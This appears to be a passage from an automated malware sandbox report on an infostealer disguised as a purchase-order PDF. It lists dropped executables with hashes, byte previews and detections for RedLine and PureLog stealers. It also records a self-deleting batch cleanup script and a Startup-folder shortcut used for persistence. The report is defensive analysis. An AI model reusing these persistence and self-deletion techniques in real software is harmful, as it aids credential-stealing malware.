                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....?.f................................. ... ....@.. .......................`............@.....................................K.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......dx...:..........h...TX...........................................0..........+.(..bd(.....s....... ....( ...(.... ....( ...o.....ds......o....(.... H...( ...o....o.....s..........io.....o..........9.....o......o...........9.....o......9.....o......*.(....a..w..........}...................v+.(T..T(.....(....(....o....*...0..?.......+.(..?8s...... l...( ...(....o......o......o......o.....(....&*..0..M.......+.(.nW...................... ....( ....... ....( ....... ....(

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1unyb2ah.j5s.ps1

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpy1dur1.m34.psm1

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_icirwimp.mxj.ps1

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mjkrdw00.xfv.psm1

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):60
                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\build.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):307712
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.081289674980977
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3072:acZqf7D34Tp/0+mA0kywMlQEg85fB1fA0PuTVAtkxzZ3RMeqiOL2bBOA:acZqf7DItnGCQNB1fA0GTV8kv0L
                                                                                                                                                                                                                                                                                                          MD5:3B6501FEEF6196F24163313A9F27DBFD
                                                                                                                                                                                                                                                                                                          SHA1:20D60478D3C161C3CACB870AAC06BE1B43719228
                                                                                                                                                                                                                                                                                                          SHA-256:0576191C50A1B6AFBCAA5CB0512DF5B6A8B9BEF9739E5308F8E2E965BF9B0FC5
                                                                                                                                                                                                                                                                                                          SHA-512:338E2C450A0B1C5DFEA3CD3662051CE231A53388BC2A6097347F14D3A59257CE3734D934DB1992676882B5F4F6A102C7E15B142434575B8970658B4833D23676
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....H(...............0.................. ... ....@.. ....................... ............@.................................<...O.... ............................................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc..............................@..B................p.......H....... ...............(w..............................................a.u.t.o.f.i.l.l.5.t.Y.W.R.q.a.W.V.o.a.m.h.h.a.m.J.8.W.W.9.y.b.2.l.X.Y.W.x.s.Z.X.Q.K.a.W.J.u.Z.W.p.k.Z.m.p.t.b.W.t.w.Y.2.5.s.c.G.V.i.a.2.x.t.b.m.t.v.Z.W.9.p.a.G.9.m.Z.W.N.8.V.H.J.v.b.m.x.p.b.m.s.K.a.m.J.k.Y.W.9.j.b.m.V.p.a.W.l.u.b.W.p.i.a.m.x.n.Y.W.x.o.Y.2.V.s.Z.2.J.l.a.m.1.u.a.W.R.8.T.m.l.m.d.H.l.X.Y.W.x.s.Z.X.Q.K.b.m.t.i.a.W.h.m.Y.m.V.v.Z.2.F.l.Y.W.9.l.a.G.x.l.Z.m.5.r.b.2.R.i.Z.W.Z.n.c.G.d.r.b.m.5.8.T.W.

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\microsofts.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1425408
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.68069838387253
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:Pk70Trcosu4CTPpR9+aWsqjnhMgeiCl7G0nehbGZpbD:PkQTAW5v+hDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:1B1EC94BDE0A57A4A82BD2F20B2CB7F3
                                                                                                                                                                                                                                                                                                          SHA1:EADF44C3FE2B366CFFE5A5E5232D3DB261ABDC6F
                                                                                                                                                                                                                                                                                                          SHA-256:2F2A9608F9B6C29C0E7AA3A4E4BD4CCBBE1194CCD430A643E1EA4A684AFE6A9F
                                                                                                                                                                                                                                                                                                          SHA-512:425451934FD68DAFBA0B72083A31E2AA9FF4CE850C89149E19318A32D1BE9E2E07448E06497DCACCC722F34239FBD17B4B1F5CD0117D97DF9B05A9CF50F19703
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Yara Hits:
                                                                                                                                                                                                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................0y.f....PE..L...t..P..........#................./.............@.............................................................................P....`..pg..............................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\server_BTC.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):231936
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.039764014369673
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                                                                                                                                                                                                          MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                                                                                                                                                                                                          SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                                                                                                                                                                                                          SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\tmpD5D5.tmp.cmd

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):164
                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.963476601274531
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3:mKDDCMNvFbuov3DUkh4E2J5xAIJWAdEFKDwU1hGDUkh4E2J5xAInTRILpmbBQty:hWKdbuoL923fJWAawDNe923fTT5
                                                                                                                                                                                                                                                                                                          MD5:392E4C7B490E7321AB4A2334132AAA6B
                                                                                                                                                                                                                                                                                                          SHA1:E9983EB3F25A2230F4C5DE7EA349BDA5FA55C4E3
                                                                                                                                                                                                                                                                                                          SHA-256:92D97EE345BD92E004E821E34CCC74354C796450EE935140F6B020A6DF6DF9D7
                                                                                                                                                                                                                                                                                                          SHA-512:CBDCA18F641F97C0607FDEAE2538A25A6135FB0F7CBD3E59356F4851099D2851BC36FB52D639545735E971FCC2C6057575406AEE281FCDEE19E912F19B71C66F
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:@echo off..timeout 6 > NUL..CD C:\Users\user\AppData\Local\Temp..DEL "server_BTC.exe" /f /q..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpD5D5.tmp.cmd" /f /q..

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\wainage

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2598912
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.909611262460053
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:5cle8cWm6n2EkjAFNb0fa6Svh5R7rjlr8Q:5cZxDFNS0vh5Rxh
                                                                                                                                                                                                                                                                                                          MD5:175B904E445C4C7E7D9976403A4C24E9
                                                                                                                                                                                                                                                                                                          SHA1:C1C85B944EB9B6430B1A6BF4E235D72E0D1ABD0A
                                                                                                                                                                                                                                                                                                          SHA-256:60BA1B14D2F261D5AA253E838C6E90055E0DCE67FF0AFD2E0EAD77E1143D286D
                                                                                                                                                                                                                                                                                                          SHA-512:B1A0C1351A20828632977749586E6E8C4839A955A70F587F28B40871732BAB8C9B7B3C018DAE57E34D12F21DCC5935881C466A2FE8A0D693F294768751FF4581
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:...WWYH0EDMY..WT.H0ADMYUuWTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WT.H0AJR.[5.].i.@..x.]>'y8B.#?88.457&_5d/<uG":y!^a...uX80<f=LNiYU5WTYH`.DM.T1WTYH0ADMYU5WT.H?BOL_U5_TYH._DMYU5"@YH0QDMY.+WTY.0ATMYU7WT]H0ADMYU1WTYH0ADM.r5WPYH.cM[U5WTYX0ATMYU5GTYX0ADMYU%WTYH0ADMYU5.GH`ADMY.+W.[H0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5..GHhADMYU5WTYH0ADMYU5WTYH0ADMYU.#1!<0ADE_U5WDYH0IDMYQ5WTYH0ADMYU5WTyH0!j?=4A6TY._DMyU5W.GH0MDMYU5WTYH0ADMY.5W.w*C2DMYU1WTYH._DMYU5WTYH0ADMYU5WTYH0.DM.{G$&:H0AD.QU5.JYH.IDM.K5WTYH0ADMYU5W.YH.ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0ADMYU5WTYH0AD

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\97dd988331e417df.bin

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):12320
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9843919295338965
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:384:jf7yAr6GgW/eb69+9PhzFvxrNMzk3kEQhtY:pr/r/ebD7zXBvitY
                                                                                                                                                                                                                                                                                                          MD5:AF88A3B3506499BE74D222F841907504
                                                                                                                                                                                                                                                                                                          SHA1:BFE71CB91286AD67A8B2FF974D089BC867AC1AB4
                                                                                                                                                                                                                                                                                                          SHA-256:4F2429C379D132B199D2436AD670348C97587CC473A900FDEF58538A0A0807E8
                                                                                                                                                                                                                                                                                                          SHA-512:71697FA870B486396A6602A0F8D04AA698D721C72DD3EF68F9405AEADC85B887095C45D8E19F84A9D9CF9B0440BBB29F0335A1A0F48291127A479CF86BF78AB3
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:......%:.8%............d.+2.V.E.Q.~.................[..tV?...e..#c./.|Jv{...a....C....:.f....l.p......y.3r...n....5.....f".C.v..p...;a._4..{.JS.U.c.&....XP.=.l:...d..=..#..}..}....>._....`.l.f.hZ.>-^>.D\..U..K$....Ff...".Q...q...Y.Ir.....$%..)...>.2...\K.Y...,..Nt~.K6........*3.zX=6...{..2A...O.&.". .g..2.Q.r...<.4..........6J....#..o.F.!|.e....V.+._5..{.........|.:H{.Y...>_.X......u....6......d.xi..P..M......N........s.6...^.A....I{.I.-...."..KZ........J..........xI`%-.cj. .-........47..@*...v)I!.U...F..:...?_......DmQ!.er..O.%~]...,.cf.49.......q....F3>o...n.(.....(.n..G..H...S.Q....o..9f{.....U.xF...G?.^g...'.y^..)../..(.....+....4...d.5u4....5.....>.........y..Uh.#.0U=g.9^&......}.H...CG.....pQ..7t.yPU..t5{.@..O.....d0z.......9_...d$~..;R'....f"].....j...U..).k<C.xQ..O.4.7...i.B.......z...C.M9..F.#..Q..!.:.A'e.././..(.." ];.5p.v.~.. ..H..rB{..{.c..!....va..~.m..B...6.TM._.3..}....y......].Lk..S(..E0.Jk..9....6.JKz.i

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):231936
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.039764014369673
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:3072:ocaWxnNbVzunOKrp3gGhTbUwjI4C2rpdf1/0dDQFd4jiSCvpoV6l7Mp:PNbhKrpnTbxT18dUFVS6lg
                                                                                                                                                                                                                                                                                                          MD5:50D015016F20DA0905FD5B37D7834823
                                                                                                                                                                                                                                                                                                          SHA1:6C39C84ACF3616A12AE179715A3369C4E3543541
                                                                                                                                                                                                                                                                                                          SHA-256:36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5
                                                                                                                                                                                                                                                                                                          SHA-512:55F639006A137732B2FA0527CD1BE24B58F5DF387CE6AA6B8DD47D1419566F87C95FC1A6B99383E8BD0BCBA06CC39AD7B32556496E46D7220C6A7B6D8390F7FC
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0......~......n(... ...@....@.. ....................................`..................................(..W....@...z........................................................................... ............... ..H............text...t.... ...................... ..`.rsrc....z...@...|..................@..@.reloc..............................@..B................P(......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....

                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                                                                                                                                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Thu Oct 10 07:07:24 2024, mtime=Thu Oct 10 07:07:24 2024, atime=Thu Oct 10 07:07:21 2024, length=231936, window=
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1794
                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.497259984439327
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24:8z4Hf4482Z4/IBd6W9au5UAgUs4FSnplwO4ZTqlEtm:8z4HQ9n/IBd6Eau9gR4+plwZTqlI
                                                                                                                                                                                                                                                                                                          MD5:136CD5F4CCBA6AE19384CA9F2B9ED20B
                                                                                                                                                                                                                                                                                                          SHA1:E65863DC97D77F369056B3D688DB9EE19FB59CF3
                                                                                                                                                                                                                                                                                                          SHA-256:6B51CFA9E06069779E475FF15157320DD645BA3C7E6135A8D8B3BE403BFBC5B9
                                                                                                                                                                                                                                                                                                          SHA-512:2296073F441DCC444508AF39274F18174A4CEA9FC2E1409EB005AEC1712DE741F9AAC0A125EFBD5B2647BD53A70A1B97DD8C36A5E76511C535A485FD66332D3F
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:L..................F.@.. ...J.lp....J.lp....N..n..............................:..DG..Yr?.D..U..k0.&...&...... M.....4..e....`.sp........t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlJY.@....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....JY.@..Roaming.@......DWSlJY.@....C.....................G.+.R.o.a.m.i.n.g.....T.1.....JY.@..ACCApi..>......JY.@JY.@....?.....................g...A.C.C.A.p.i.....l.2.....JY.@ .TROJAN~1.EXE..P......JY.@JY.@...........................?..T.r.o.j.a.n.A.I.b.o.t...e.x.e.......e...............-.......d...................C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe....A.c.c.S.y.s.%.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.T.r.o.j.a.n.A.I.b.o.t...e.x.e.1.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.s.e.r.v.e.r._.B.T.C...e.x.e.........%USERPROFILE%\AppData\Local\Temp\server_BTC.exe............................................................................................................

                                                                                                                                                                                                                                                                                                          C:\Windows\DtcInstall.log

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                          Size (bytes):2313
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.130722741333044
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786h:Z070s0Y0q0mF7Dm5y
                                                                                                                                                                                                                                                                                                          MD5:233E4CFA7155FBF05E0659877FF22CD9
                                                                                                                                                                                                                                                                                                          SHA1:848C147C0421196571C360544425CDB7271DBE9E
                                                                                                                                                                                                                                                                                                          SHA-256:AC7B7E24B48335EF4215D13A0335917A0451D5FE5A0FEF702689B4DE592B160B
                                                                                                                                                                                                                                                                                                          SHA-512:AC247EC0B9F24E12F05E99E7B5AA815A5312F6CAC671FC59DE4D9AC60BDA7009C8FEB442BBEE8D9BBAB8B95182190E4FD5280A8ECEB9C6B80EA47DCC7BA37B80
                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                                                                          Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy

                                                                                                                                                                                                                                                                                                          C:\Windows\Logs\WindowsBackup\WBEngine.0.etl

                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\System32\wbengine.exe
                                                                                                                                                                                                                                                                                                          File Type:dBase III DBT, version number 0, next free block index 10240, 1st item "hcC\216"
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):30720
                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.1238659522399166
                                                                                                                                                                                                                                                                                                          Encrypted:false
